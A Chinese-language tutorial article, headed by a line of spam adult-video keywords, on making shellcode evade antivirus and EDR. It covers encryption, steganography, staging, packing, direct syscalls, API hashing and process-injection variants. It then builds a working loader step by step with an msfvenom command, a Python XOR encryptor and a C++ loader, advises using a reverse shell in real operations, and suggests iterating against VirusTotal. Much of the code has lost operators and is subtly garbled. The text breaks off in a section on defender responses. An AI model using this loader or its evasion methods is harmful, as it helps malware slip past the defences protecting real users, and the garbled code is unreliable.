免费国产精品自在自线-91精品国产色综合久久久浪潮-99热久久免费频精品-国产精品国模在线观看-久久亚洲国产精品成人?V秋霞-久久国产一级A片免费播放-亚洲国产欧洲综合97久久-久久国产白嫩美女呻吟高潮

ARTICLE DETAIL

資訊詳情

深耕商務(wù)建站與企業(yè)官網(wǎng)運(yùn)營的一線實(shí)戰(zhàn)洞察。

Shellcode免殺技術(shù)實(shí)戰(zhàn):從靜態(tài)加密到動(dòng)態(tài)系統(tǒng)調(diào)用的攻防對抗

Shellcode免殺技術(shù)實(shí)戰(zhàn):從靜態(tài)加密到動(dòng)態(tài)系統(tǒng)調(diào)用的攻防對抗 1. 項(xiàng)目概述為什么Shellcode免殺是攻防對抗的焦點(diǎn)在安全攻防的世界里Shellcode免殺技術(shù)就像一場永不停歇的“貓鼠游戲”。我接觸過很多紅隊(duì)評估和滲透測試項(xiàng)目一個(gè)繞不開的坎就是如何讓我們的“工具”在目標(biāo)系統(tǒng)上悄無聲息地落地并執(zhí)行。這里的“工具”很多時(shí)候指的就是一段精心構(gòu)造的Shellcode。它可能負(fù)責(zé)彈回一個(gè)命令行加載一個(gè)功能更全的后滲透模塊或者執(zhí)行一個(gè)特定的內(nèi)存操作。但無論目的如何只要它被終端安全軟件EDR/AV的靜態(tài)或動(dòng)態(tài)引擎識(shí)別出來行動(dòng)就宣告失敗甚至可能暴露攻擊者的基礎(chǔ)設(shè)施。因此深入理解Shellcode免殺不僅僅是掌握幾種加密或編碼技巧更是對現(xiàn)代安全防護(hù)體系工作原理的一次逆向拆解。這篇文章我將結(jié)合自己踩過的坑和實(shí)戰(zhàn)經(jīng)驗(yàn)從原理到實(shí)踐為你拆解Shellcode免殺的核心邏輯、主流技術(shù)以及對抗策略目標(biāo)是讓你不僅能做出一個(gè)“免殺”的樣本更能理解它為什么能“免殺”以及防守方會(huì)如何應(yīng)對。簡單來說Shellcode免殺技術(shù)就是通過一系列變換和偽裝手段改變Shellcode在磁盤靜態(tài)和內(nèi)存動(dòng)態(tài)中的特征使其逃避安全產(chǎn)品的檢測。這背后涉及編譯器行為、操作系統(tǒng)加載機(jī)制、反病毒引擎的簽名庫、啟發(fā)式規(guī)則、行為沙箱等多個(gè)層面的知識(shí)。對于安全研究人員、滲透測試工程師和惡意軟件分析師而言這都是必須啃下的硬骨頭。接下來我會(huì)從設(shè)計(jì)思路、核心技術(shù)、實(shí)操編碼到對抗演進(jìn)一步步帶你深入這個(gè)領(lǐng)域。2. 核心原理拆解安全軟件如何檢測Shellcode在思考如何“免殺”之前我們必須先成為“獵人”理解“獵人”安全軟件的捕獵方式?,F(xiàn)代終端防護(hù)是一個(gè)多層防御體系對Shellcode的檢測主要發(fā)生在兩個(gè)階段靜態(tài)分析和動(dòng)態(tài)分析。2.1 靜態(tài)特征檢測第一道關(guān)卡靜態(tài)分析發(fā)生在文件落地但尚未執(zhí)行時(shí)。安全軟件會(huì)像法醫(yī)一樣仔細(xì)檢查這個(gè)“可疑物品”的每一個(gè)細(xì)節(jié)。文件結(jié)構(gòu)與熵值分析一個(gè)正常的Windows可執(zhí)行文件PE文件有非常規(guī)整的結(jié)構(gòu)DOS頭、PE頭、節(jié)表、代碼節(jié)、數(shù)據(jù)節(jié)等。而一段純粹的、未經(jīng)處理的Shellcode通常只是一個(gè)二進(jìn)制的“數(shù)據(jù)塊”不具備合法的PE結(jié)構(gòu)。直接將其作為可執(zhí)行文件會(huì)被輕易識(shí)別。此外加密或高度壓縮的數(shù)據(jù)會(huì)導(dǎo)致文件某個(gè)區(qū)域的熵值隨機(jī)性度量異常高這本身就是一個(gè)強(qiáng)烈的可疑信號。很多安全軟件會(huì)計(jì)算文件各節(jié)的熵值過高熵值的節(jié)如.text代碼節(jié)會(huì)觸發(fā)警報(bào)。字節(jié)序列簽名Signature這是最傳統(tǒng)也是最基礎(chǔ)的檢測方式。安全廠商維護(hù)著一個(gè)龐大的特征庫里面記錄了已知惡意代碼的特定字節(jié)序列即“簽名”。如果你的Shellcode來自公開的滲透測試框架如Metasploit的windows/x64/meterpreter/reverse_tcp其開頭的幾個(gè)字節(jié)例如fc4883e4f0e8c0...很可能早已被收錄。靜態(tài)掃描時(shí)引擎只需進(jìn)行簡單的字節(jié)匹配就能發(fā)現(xiàn)你。字符串與API導(dǎo)入表引擎會(huì)提取文件中的所有可讀字符串和API函數(shù)名。如果發(fā)現(xiàn)了明顯的惡意痕跡如CreateRemoteThread、VirtualAllocEx、WriteProcessMemory這類常用于進(jìn)程注入的API名稱或者硬編碼的C2服務(wù)器地址、特殊的路徑字符串都會(huì)大大增加可疑度。注意靜態(tài)檢測追求的是速度和低誤報(bào)率。因此它的規(guī)則往往是精確匹配或簡單的模式匹配。我們的免殺思路首要目標(biāo)就是破壞這些靜態(tài)特征。2.2 動(dòng)態(tài)行為檢測執(zhí)行時(shí)的“現(xiàn)場直播”如果文件僥幸通過了靜態(tài)檢查被用戶運(yùn)行那么動(dòng)態(tài)行為分析的“大戲”就開場了。此時(shí)安全軟件會(huì)化身“監(jiān)工”在系統(tǒng)內(nèi)核層或通過沙箱監(jiān)控程序的一舉一動(dòng)。API調(diào)用序列監(jiān)控這是行為檢測的核心。安全軟件并不關(guān)心你調(diào)用了哪個(gè)具體的API而是關(guān)心你調(diào)用了哪些API以及它們組合起來的“故事”是否可疑。一個(gè)經(jīng)典的Shellcode加載流程可能是VirtualAlloc申請可執(zhí)行內(nèi)存 -WriteProcessMemory或RtlMoveMemory寫入Shellcode -CreateThread或QueueUserAPC執(zhí)行內(nèi)存。這一套組合拳被稱為“內(nèi)存分配、寫入、執(zhí)行”鏈?zhǔn)墙^大多數(shù)EDR/AV都會(huì)重點(diǎn)監(jiān)控的高危行為序列。內(nèi)存屬性修改監(jiān)控正常程序的內(nèi)存頁屬性是相對固定的例如代碼段是PAGE_EXECUTE_READ數(shù)據(jù)段是PAGE_READWRITE。而Shellcode加載器常常需要先將內(nèi)存屬性改為PAGE_READWRITE以便寫入數(shù)據(jù)然后再改為PAGE_EXECUTE_READ或PAGE_EXECUTE_READWRITE來執(zhí)行。這種對內(nèi)存頁屬性的“寫后執(zhí)行”修改操作是另一個(gè)極其敏感的行為指標(biāo)。子進(jìn)程創(chuàng)建與進(jìn)程注入如果Shellcode的目的是注入到其他進(jìn)程如explorer.exe,svchost.exe以實(shí)現(xiàn)持久化或規(guī)避那么CreateRemoteThread、NtMapViewOfSection等進(jìn)程注入技術(shù)相關(guān)的API調(diào)用以及異常的進(jìn)程父子關(guān)系都會(huì)被嚴(yán)密監(jiān)控。沙箱環(huán)境探測高級的惡意軟件會(huì)嘗試探測自己是否運(yùn)行在沙箱或分析環(huán)境中。例如檢查系統(tǒng)運(yùn)行時(shí)間沙箱往往剛啟動(dòng)、檢查物理內(nèi)存大小沙箱可能分配較小、檢查是否存在分析工具進(jìn)程如procmon.exe,wireshark.exe、檢查鼠標(biāo)移動(dòng)或用戶交互痕跡沙箱可能無交互。如果探測到沙箱環(huán)境惡意代碼會(huì)選擇不執(zhí)行惡意行為從而逃避動(dòng)態(tài)分析。理解了這些檢測原理我們的免殺策略就有了明確的靶心在靜態(tài)層面混淆特征使其不像“已知的壞東西”在動(dòng)態(tài)層面要么讓行為看起來“正?!币囱舆t或規(guī)避敏感行為的觸發(fā)。3. 靜態(tài)免殺技術(shù)讓Shellcode“面目全非”靜態(tài)免殺是基礎(chǔ)目標(biāo)是讓原始的Shellcode在磁盤上看起來“人畜無害”。這里有幾個(gè)經(jīng)過實(shí)戰(zhàn)檢驗(yàn)的核心方法。3.1 編碼與加密改變字節(jié)面貌這是最直接的方法目的是破壞基于字節(jié)序列的簽名匹配。異或XOR編碼這是最簡單、最常用的方法。選擇一個(gè)密鑰Key將Shellcode的每一個(gè)字節(jié)與這個(gè)密鑰進(jìn)行異或運(yùn)算。解密時(shí)再用同樣的密鑰異或一次即可還原。它的優(yōu)點(diǎn)是速度快、實(shí)現(xiàn)簡單。但弱點(diǎn)也很明顯如果密鑰是單字節(jié)加密后的數(shù)據(jù)可能仍存在統(tǒng)計(jì)特征此外xor指令本身也可能成為特征。// 簡單的異或加密示例C語言風(fēng)格 unsigned char shellcode[] {0xfc, 0x48, 0x83, ...}; unsigned char key 0xAA; for(int i 0; i sizeof(shellcode); i) { shellcode[i] shellcode[i] ^ key; // 加密 // 解密時(shí)再次執(zhí)行 shellcode[i] shellcode[i] ^ key; }AES/RC4等加密算法使用標(biāo)準(zhǔn)加密算法能產(chǎn)生熵值很高、近乎隨機(jī)的密文能有效規(guī)避簽名檢測。但引入加密算法意味著你需要在加載器中包含解密函數(shù)這可能會(huì)增加加載器本身的特征。通常我們會(huì)使用系統(tǒng)自帶的加密API如Windows的Cryptography API: Next Generation (CNG)或引入小型、混淆過的解密代碼。自定義編碼算法為了進(jìn)一步規(guī)避對標(biāo)準(zhǔn)加密算法特征的檢測可以設(shè)計(jì)簡單的自定義編碼如字節(jié)順序反轉(zhuǎn)、加減固定值、基于位置的變換等。核心思想是增加分析的復(fù)雜度。實(shí)操心得不要使用固定的、簡單的異或密鑰??梢圆捎枚嘧止?jié)循環(huán)密鑰或者從文件某個(gè)偏移量或環(huán)境變量中動(dòng)態(tài)計(jì)算密鑰。我曾在一個(gè)項(xiàng)目中將密鑰隱藏在PNG圖片文件的CRC校驗(yàn)值里加載器運(yùn)行時(shí)讀取圖片并計(jì)算CRC值作為密鑰效果很好。3.2 分離與隱寫藏匿于無形與其改變Shellcode的樣子不如把它藏起來讓掃描引擎根本找不到它。資源文件分離將加密后的Shellcode作為資源Resource捆綁在正常的PE文件如圖片查看器、計(jì)算器中。在運(yùn)行時(shí)通過FindResource、LoadResource、LockResource等API從自身資源節(jié)中讀取并解密。這樣靜態(tài)掃描時(shí)Shellcode不在主要的.text或.data節(jié)中而是藏在.rsrc節(jié)里規(guī)避了針對數(shù)據(jù)節(jié)的熵值檢查。網(wǎng)絡(luò)下載Staging加載器本身不包含任何Shellcode。它只是一個(gè)“下載器”運(yùn)行時(shí)從遠(yuǎn)程服務(wù)器C2下載加密的Shellcode到內(nèi)存中然后解密執(zhí)行。這徹底避免了本地文件的靜態(tài)特征。但缺點(diǎn)是增加了網(wǎng)絡(luò)交互可能被網(wǎng)絡(luò)流量檢測設(shè)備發(fā)現(xiàn)。隱寫術(shù)Steganography將Shellcode隱藏在一張普通的圖片、一個(gè)文檔甚至一段音頻文件的二進(jìn)制數(shù)據(jù)中。例如將加密后的Shellcode寫入PNG圖片的IDAT數(shù)據(jù)塊末尾不影響圖片正常顯示。加載器需要解析文件格式精準(zhǔn)定位并提取隱藏的數(shù)據(jù)。這種方法對靜態(tài)掃描的繞過效果極佳因?yàn)槲募雌饋硗耆!?.3 格式偽裝與殼保護(hù)PE文件格式偽裝將Shellcode加載器本身偽裝成一個(gè)合法的、簽名的應(yīng)用程序。或者構(gòu)建一個(gè)具備完全合法PE頭、節(jié)表但節(jié)區(qū)內(nèi)容被加密或替換的“空殼”PE文件。靜態(tài)分析時(shí)文件結(jié)構(gòu)完美熵值正常能繞過初步檢查。加殼Packing使用商業(yè)或自定義的加殼工具如UPX但UPX已被廣泛識(shí)別對加載器進(jìn)行壓縮和加密。加殼后的程序原始代碼被壓縮加密入口點(diǎn)OEP被替換為殼的引導(dǎo)代碼。殼負(fù)責(zé)在內(nèi)存中解密并跳轉(zhuǎn)到原始程序。這增加了逆向分析和靜態(tài)特征提取的難度。但需要注意很多加殼工具本身就有很強(qiáng)的特征會(huì)被標(biāo)記。因此使用小眾殼或自定義殼是關(guān)鍵。代碼混淆Obfuscation對加載器自身的代碼進(jìn)行混淆如插入垃圾指令NOP或無效運(yùn)算、控制流扁平化、字符串加密等。這雖然主要增加的是分析難度但混淆后編譯器生成的機(jī)器碼也會(huì)發(fā)生變化有時(shí)也能意外地繞過一些基于簡單模式的靜態(tài)簽名。4. 動(dòng)態(tài)免殺技術(shù)讓行為“看起來很正?!蓖ㄟ^了靜態(tài)檢查只是拿到了入場券。真正的挑戰(zhàn)是在運(yùn)行時(shí)如何“低調(diào)行事”。動(dòng)態(tài)免殺的核心是API調(diào)用鏈的偽裝與拆分。4.1 直接系統(tǒng)調(diào)用Syscall這是目前對抗EDR/AV用戶態(tài)Hook最主流、最有效的方法。EDR通常通過Hookkernel32.dll或ntdll.dll中的關(guān)鍵API如NtAllocateVirtualMemory,NtCreateThreadEx來監(jiān)控行為。直接系統(tǒng)調(diào)用繞過這些用戶態(tài)的Hook直接通過syscall指令與內(nèi)核交互。原理每個(gè)系統(tǒng)調(diào)用都有一個(gè)唯一的系統(tǒng)調(diào)用號Syscall Number。在Windows中ntdll.dll中的函數(shù)如NtAllocateVirtualMemory本質(zhì)就是封裝了syscall指令的存根Stub。我們可以直接復(fù)制這些存根中的匯編代碼主要是系統(tǒng)調(diào)用號和syscall指令或者動(dòng)態(tài)地從ntdll.dll中讀取這些信息在自己的代碼里發(fā)起調(diào)用。; x64 系統(tǒng)下 NtAllocateVirtualMemory 系統(tǒng)調(diào)用的簡化示例概念性 mov r10, rcx ; 第一個(gè)參數(shù)移到 r10 (Windows x64調(diào)用約定) mov eax, 18h ; 系統(tǒng)調(diào)用號 (NtAllocateVirtualMemory)這個(gè)值隨Windows版本變化 syscall ret實(shí)現(xiàn)關(guān)鍵系統(tǒng)調(diào)用號獲取系統(tǒng)調(diào)用號隨Windows版本甚至每次更新而變化。不能硬編碼。常見方法是從本機(jī)ntdll.dll的內(nèi)存中動(dòng)態(tài)解析或者使用經(jīng)過哈希處理的函數(shù)名在PEB中遍歷查找。參數(shù)準(zhǔn)備必須嚴(yán)格遵守x64或x86的系統(tǒng)調(diào)用約定正確設(shè)置寄存器。返回處理系統(tǒng)調(diào)用返回后狀態(tài)在RAX/EAX寄存器中需要正確處理。注意事項(xiàng)直接使用syscall雖然強(qiáng)大但代碼與系統(tǒng)版本強(qiáng)相關(guān)兼容性需要仔細(xì)處理。此外一些高級EDR已經(jīng)開始在內(nèi)核層監(jiān)控syscall指令的調(diào)用來源如果發(fā)現(xiàn)來自非ntdll.dll的內(nèi)存區(qū)域也會(huì)產(chǎn)生告警。因此更進(jìn)階的做法是結(jié)合“返回地址欺騙”Return Address Spoofing等技術(shù)讓調(diào)用??雌饋硐袷菑膎tdll.dll發(fā)起的。4.2 API動(dòng)態(tài)解析與調(diào)用為了避免在導(dǎo)入表IAT中留下敏感的API函數(shù)名我們可以在運(yùn)行時(shí)動(dòng)態(tài)獲取API地址。經(jīng)典方法GetProcAddress和LoadLibrary這是基礎(chǔ)方法。但GetProcAddress和LoadLibrary本身也可能被監(jiān)控。我們可以通過解析PEB進(jìn)程環(huán)境塊和PE文件結(jié)構(gòu)手動(dòng)遍歷kernel32.dll的導(dǎo)出表來查找GetProcAddress的地址從而實(shí)現(xiàn)“無導(dǎo)入表”的API解析。哈希處理在代碼中存儲(chǔ)API函數(shù)名的哈希值如ROR13哈希而不是明文字符串。在動(dòng)態(tài)解析時(shí)計(jì)算DLL導(dǎo)出函數(shù)名的哈希并與我們存儲(chǔ)的哈希進(jìn)行比較。這可以有效避免字符串掃描。// 計(jì)算函數(shù)名哈希的示例 DWORD HashStringROR13(const char* str) { DWORD hash 0; while (*str) { hash (hash 13) | (hash (32 - 13)); // 循環(huán)右移13位 hash *str; str; } return hash; } // 存儲(chǔ)的哈希值例如 HashStringROR13(VirtualAlloc)4.3 進(jìn)程注入技術(shù)的“低調(diào)”變種如果Shellcode需要注入到其他進(jìn)程傳統(tǒng)的CreateRemoteThread已經(jīng)如同在監(jiān)控?cái)z像頭下大聲喊叫。我們需要更隱蔽的方法。進(jìn)程鏤空Process Hollowing創(chuàng)建一個(gè)合法的、處于掛起狀態(tài)的進(jìn)程如svchost.exe將其主線程掛起然后“挖空”其內(nèi)存中的原始鏡像替換為我們的惡意代碼最后恢復(fù)線程執(zhí)行。從外部看進(jìn)程名是合法的但執(zhí)行的是我們的代碼。防守方會(huì)檢查進(jìn)程內(nèi)存與磁盤文件的差異。APC注入Asynchronous Procedure Call將Shellcode注入到目標(biāo)線程的APC隊(duì)列中。當(dāng)線程進(jìn)入可報(bào)警狀態(tài)時(shí)Shellcode會(huì)被執(zhí)行。特別是“早期鳥APC注入”在線程啟動(dòng)前就插入APC可以繞過一些基于線程創(chuàng)建的檢測。但APC注入需要目標(biāo)線程進(jìn)入告警狀態(tài)不確定性較高。線程劫持Thread Hijacking掛起目標(biāo)進(jìn)程中的一個(gè)現(xiàn)有線程修改其上下文主要是指令指針RIP/EIP和棧使其指向我們的Shellcode然后恢復(fù)線程。這種方法不創(chuàng)建新線程行為更隱蔽。難點(diǎn)在于需要穩(wěn)定地保存和恢復(fù)線程原始上下文以及處理線程棧。映射視圖注入Section Mapping利用Windows的節(jié)區(qū)對象Section Object。首先創(chuàng)建一個(gè)包含Shellcode的節(jié)區(qū)對象然后將這個(gè)節(jié)區(qū)映射到目標(biāo)進(jìn)程的地址空間。最后通過APC或線程劫持等方式讓目標(biāo)進(jìn)程的線程去執(zhí)行該映射區(qū)域。這種方法文件操作痕跡少相對隱蔽。4.4 內(nèi)存操作規(guī)避技巧內(nèi)存屬性“先執(zhí)行后寫”傳統(tǒng)的“申請可寫內(nèi)存-寫入-改為可執(zhí)行”鏈條太經(jīng)典??梢試L試?yán)靡恍┖戏ǖ摹⒈旧砭途哂锌蓤?zhí)行權(quán)限的內(nèi)存區(qū)域。例如** .NET JIT內(nèi)存**.NET運(yùn)行時(shí)生成的JIT編譯代碼所在的內(nèi)存頁默認(rèn)是可執(zhí)行的。可以嘗試與.NET程序交互或利用其機(jī)制。內(nèi)存洞Memory Holes在進(jìn)程地址空間中尋找已經(jīng)存在且具有可執(zhí)行權(quán)限的閑置內(nèi)存區(qū)域例如某些DLL加載后留下的間隙。但這不穩(wěn)定且難以移植。濫用合法可執(zhí)行模塊修改一個(gè)已加載DLL中的廢棄代碼區(qū)域如對齊填充區(qū)來存放Shellcode。這需要精確的逆向分析。堆棧內(nèi)存執(zhí)行雖然數(shù)據(jù)執(zhí)行保護(hù)DEP默認(rèn)禁止棧內(nèi)存執(zhí)行但可以通過VirtualProtect臨時(shí)開啟棧的PAGE_EXECUTE_READWRITE權(quán)限或者利用某些特定情況如舊版軟件、特定編譯選項(xiàng)下DEP未生效的環(huán)境。這不是一個(gè)通用的好方法。圖像文件執(zhí)行選項(xiàng)IFEO調(diào)試器注入這是一個(gè)非常古老的技巧通過修改注冊表將一個(gè)調(diào)試器設(shè)置為目標(biāo)程序的“預(yù)調(diào)試器”。當(dāng)目標(biāo)程序啟動(dòng)時(shí)調(diào)試器會(huì)先啟動(dòng)并將代碼注入到目標(biāo)進(jìn)程中。這種方法在行為上看起來像一個(gè)合法的調(diào)試會(huì)話但注冊表修改動(dòng)作本身會(huì)被監(jiān)控。5. 完整實(shí)戰(zhàn)構(gòu)建一個(gè)多層免殺的Shellcode加載器理論說了這么多我們動(dòng)手實(shí)現(xiàn)一個(gè)集成了部分上述技術(shù)的簡易加載器。這個(gè)加載器將使用異或加密、資源文件分離、直接系統(tǒng)調(diào)用和動(dòng)態(tài)API解析。5.1 第一步生成并加密Shellcode我們使用MSFVenom生成一個(gè)原始的Shellcode并立即用Python腳本進(jìn)行加密。# 生成原始Shellcode (例如一個(gè)簡單的MessageBox) msfvenom -p windows/x64/messagebox TEXTHello from Shellcode -f raw -o raw_shellcode.bin # 注意實(shí)戰(zhàn)中應(yīng)使用反向shell等此處用MessageBox便于觀察效果。編寫一個(gè)Python加密腳本encrypt_sc.pyimport sys def xor_encrypt(data, key): # 使用多字節(jié)循環(huán)密鑰 key_bytes key.encode(utf-8) encrypted bytearray() for i in range(len(data)): encrypted.append(data[i] ^ key_bytes[i % len(key_bytes)]) return bytes(encrypted) if __name__ __main__: if len(sys.argv) ! 3: print(fUsage: {sys.argv[0]} input_file output_file) sys.exit(1) with open(sys.argv[1], rb) as f: raw_sc f.read() # 使用一個(gè)復(fù)雜的密鑰可以是從某個(gè)文件計(jì)算出的哈希值 encryption_key MyComplexStaticKey123!# encrypted_sc xor_encrypt(raw_sc, encryption_key) with open(sys.argv[2], wb) as f: f.write(encrypted_sc) print(f[] Shellcode encrypted. Original size: {len(raw_sc)}, Encrypted size: {len(encrypted_sc)}) # 計(jì)算并打印加密后數(shù)據(jù)的熵值可選需要安裝math庫 # 高熵值提示我們需要在加載器中妥善隱藏它。運(yùn)行python encrypt_sc.py raw_shellcode.bin encrypted_sc.bin。5.2 第二步將加密Shellcode嵌入資源文件我們使用Visual Studio創(chuàng)建一個(gè)簡單的C控制臺(tái)項(xiàng)目或者直接使用MinGW和資源編譯器。創(chuàng)建資源文件shellcode.rc:// shellcode.rc IDR_ENCRYPTED_SC RCDATA encrypted_sc.bin編譯資源文件(使用rc.exe或windres):rc.exe shellcode.rc # 或使用 MinGW windres shellcode.rc -o shellcode.res這會(huì)生成shellcode.res文件。5.3 第三步編寫加載器代碼關(guān)鍵部分以下是加載器loader.cpp的核心代碼框架集成了動(dòng)態(tài)解析和直接系統(tǒng)調(diào)用思路。#include windows.h #include stdio.h // 1. 動(dòng)態(tài)獲取函數(shù)地址的輔助函數(shù)使用哈希 typedef HMODULE (WINAPI *pLoadLibraryA)(LPCSTR); typedef FARPROC (WINAPI *pGetProcAddress)(HMODULE, LPCSTR); // 一個(gè)簡單的ROR13哈希函數(shù) DWORD HashStringROR13(const char* str) { DWORD hash 0; while (*str) { hash (hash 13) | (hash (32 - 13)); hash *str; str; } return hash; } // 通過PEB遍歷獲取Kernel32基址然后解析GetProcAddress地址 // 此處省略詳細(xì)的PEB遍歷代碼這是一個(gè)獨(dú)立且復(fù)雜的技術(shù)點(diǎn)。 // 假設(shè)我們通過某種方式已經(jīng)獲得了 GetProcAddress 的地址存儲(chǔ)在 fnGetProcAddress 中。 pGetProcAddress fnGetProcAddress ...; // 通過PEB解析得到 // 2. 解密函數(shù) (與Python腳本對應(yīng)的XOR解密) void XorDecrypt(BYTE* data, SIZE_T size, const char* key) { SIZE_T keyLen strlen(key); for (SIZE_T i 0; i size; i) { data[i] ^ key[i % keyLen]; } } // 3. 直接系統(tǒng)調(diào)用相關(guān)結(jié)構(gòu)定義以NtAllocateVirtualMemory為例 // 系統(tǒng)調(diào)用號需要?jiǎng)討B(tài)獲取這里以Win10 2004的某個(gè)版本為例僅作演示不可硬編碼。 #define SYS_NtAllocateVirtualMemory 0x18 typedef struct _SYSCALL_ENTRY { DWORD hash; DWORD syscallNumber; } SYSCALL_ENTRY; // 一個(gè)簡陋的系統(tǒng)調(diào)用執(zhí)行函數(shù)內(nèi)聯(lián)匯編x64 // 實(shí)際項(xiàng)目中應(yīng)從ntdll.dll內(nèi)存中動(dòng)態(tài)解析系統(tǒng)調(diào)用號并組裝調(diào)用門。 // 此處僅為概念演示。 __declspec(naked) NTSTATUS SysNtAllocateVirtualMemory( HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect) { __asm { mov r10, rcx mov eax, SYS_NtAllocateVirtualMemory // 動(dòng)態(tài)獲取的調(diào)用號應(yīng)替換這里 syscall ret } } // 4. 主函數(shù) int main() { // 動(dòng)態(tài)獲取必要的API假設(shè)我們已經(jīng)有了fnGetProcAddress HMODULE hKernel32 LoadLibraryA(kernel32.dll); // 簡單起見這里直接用LoadLibraryA // 更隱蔽的做法是使用GetModuleHandle或PEB遍歷獲取kernel32基址 if (!hKernel32) return -1; // 使用動(dòng)態(tài)解析的GetProcAddress或我們自己的實(shí)現(xiàn)來獲取其他函數(shù) auto fnFindResource (decltype(FindResourceA)*)fnGetProcAddress(hKernel32, FindResourceA); auto fnLoadResource (decltype(LoadResource)*)fnGetProcAddress(hKernel32, LoadResource); auto fnLockResource (decltype(LockResource)*)fnGetProcAddress(hKernel32, LockResource); auto fnSizeofResource (decltype(SizeofResource)*)fnGetProcAddress(hKernel32, SizeofResource); // ... 獲取其他需要的API // 從資源中加載加密的Shellcode HRSRC hRes fnFindResource(NULL, MAKEINTRESOURCE(IDR_ENCRYPTED_SC), RT_RCDATA); if (!hRes) return -1; HGLOBAL hResData fnLoadResource(NULL, hRes); if (!hResData) return -1; BYTE* pEncryptedData (BYTE*)fnLockResource(hResData); DWORD dwSize fnSizeofResource(NULL, hRes); if (!pEncryptedData || dwSize 0) return -1; // 在內(nèi)存中解密Shellcode // 注意為了演示我們直接在原資源內(nèi)存解密實(shí)際應(yīng)復(fù)制到新緩沖區(qū)。 // 因?yàn)橘Y源內(nèi)存默認(rèn)是只讀的需要先改為可寫。 DWORD oldProtect; VirtualProtect(pEncryptedData, dwSize, PAGE_READWRITE, oldProtect); XorDecrypt(pEncryptedData, dwSize, MyComplexStaticKey123!#); VirtualProtect(pEncryptedData, dwSize, oldProtect, oldProtect); // 申請可執(zhí)行內(nèi)存 (嘗試使用更低調(diào)的方式) // 方式A傳統(tǒng)API容易被Hook // void* execMem VirtualAlloc(NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); // 方式B使用直接系統(tǒng)調(diào)用假設(shè)我們已經(jīng)實(shí)現(xiàn)了 void* execMem NULL; SIZE_T regionSize dwSize; NTSTATUS status SysNtAllocateVirtualMemory( GetCurrentProcess(), execMem, 0, ?ionSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (status ! 0) { // NTSTATUS成功值為0 // 系統(tǒng)調(diào)用失敗回退到傳統(tǒng)API實(shí)戰(zhàn)中應(yīng)有更優(yōu)雅的降級策略 execMem VirtualAlloc(NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); } if (!execMem) return -1; // 復(fù)制解密后的Shellcode到可執(zhí)行內(nèi)存 // 這里可以使用RtlMoveMemory或其等價(jià)物 memcpy(execMem, pEncryptedData, dwSize); // 創(chuàng)建線程執(zhí)行Shellcode // 同樣這里可以使用CreateThread也可以嘗試更隱蔽的線程創(chuàng)建方式如CreateRemoteThread注入自身無意義或APC。 HANDLE hThread CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)execMem, NULL, 0, NULL); if (hThread) { WaitForSingleObject(hThread, INFINITE); CloseHandle(hThread); } // 清理可選 VirtualFree(execMem, 0, MEM_RELEASE); return 0; }5.4 第四步編譯與測試編譯將loader.cpp、shellcode.res以及必要的資源頭文件一起編譯。cl.exe /nologo /O2 /MT loader.cpp shellcode.res /link /OUT:loader.exe確保使用靜態(tài)鏈接/MT以減少運(yùn)行時(shí)依賴并且進(jìn)行發(fā)布優(yōu)化/O2。測試首先在無安全軟件的虛擬機(jī)中運(yùn)行確保Shellcode能正常彈出MessageBox。然后上傳到 VirusTotal 或使用本地安裝的多個(gè)殺毒軟件進(jìn)行掃描。記錄檢測率。分析被哪些引擎檢測到嘗試調(diào)整加密算法、密鑰、資源類型、或加入更多的代碼混淆來降低檢測率。實(shí)操心得這是一個(gè)“玩具級”的示例。真正的實(shí)戰(zhàn)加載器需要考慮更多細(xì)節(jié)可靠的PEB遍歷獲取API、健壯的系統(tǒng)調(diào)用號動(dòng)態(tài)解析、完善的錯(cuò)誤處理、對資源內(nèi)存的復(fù)制而非原地解密、以及最終的內(nèi)存權(quán)限清理將內(nèi)存從PAGE_EXECUTE_READWRITE改回PAGE_READONLY以規(guī)避某些內(nèi)存掃描。此外將加載器本身進(jìn)行加殼或混淆是必要的下一步。6. 對抗策略演進(jìn)防守方的視角與應(yīng)對免殺技術(shù)不是一勞永逸的。防守方EDR/AV廠商也在不斷進(jìn)化。理解他們的策略才能預(yù)判和調(diào)整我們的技術(shù)。6.1 防守方的檢測升級靜態(tài)檢測的智能化模糊哈希Fuzzy Hashing如ssdeep。即使文件被輕微修改如插入一些NOP也能計(jì)算出相似的哈希值用于關(guān)聯(lián)同源惡意軟件。機(jī)器學(xué)習(xí)/深度學(xué)習(xí)模型訓(xùn)練模型識(shí)別惡意文件的特征如字節(jié)分布、API序列模式、控制流圖結(jié)構(gòu)對變種和未知威脅有更好的檢出率。對抗方法包括生成對抗樣本輕微擾動(dòng)欺騙模型或使用完全不同的代碼結(jié)構(gòu)。結(jié)構(gòu)語義分析不僅看字節(jié)還分析程序的邏輯結(jié)構(gòu)。例如識(shí)別出“解密循環(huán)內(nèi)存分配執(zhí)行”這一模式即使具體指令變了模式本身就可疑。動(dòng)態(tài)檢測的深度化內(nèi)核回調(diào)Kernel CallbacksEDR驅(qū)動(dòng)注冊內(nèi)核回調(diào)監(jiān)控進(jìn)程、線程、鏡像加載、注冊表等核心事件比用戶態(tài)Hook更底層、更難繞過。ETWEvent Tracing for Windows微軟提供的強(qiáng)大事件追蹤框架。EDR可以訂閱大量的系統(tǒng)事件如進(jìn)程創(chuàng)建、文件操作、網(wǎng)絡(luò)連接進(jìn)行實(shí)時(shí)分析。繞過ETW需要更底層的操作如嘗試禁用ETW提供程序或篡改ETW事件數(shù)據(jù)。內(nèi)存掃描與YARA規(guī)則EDR會(huì)定期或觸發(fā)式地掃描進(jìn)程內(nèi)存使用YARA規(guī)則匹配內(nèi)存中的Shellcode特征即使已解密。應(yīng)對方法是僅在執(zhí)行前一刻解密或者使用“反射式DLL注入”等技術(shù)讓代碼始終以“數(shù)據(jù)”形態(tài)存在直到執(zhí)行瞬間才被解析。行為時(shí)序分析與因果關(guān)系鏈不僅看單個(gè)API還分析一系列事件在時(shí)間上的關(guān)聯(lián)性構(gòu)建攻擊鏈故事。例如一個(gè)進(jìn)程剛網(wǎng)絡(luò)下載了數(shù)據(jù)緊接著就發(fā)生了內(nèi)存屬性修改和線程創(chuàng)建這個(gè)因果關(guān)系鏈的得分會(huì)很高。6.2 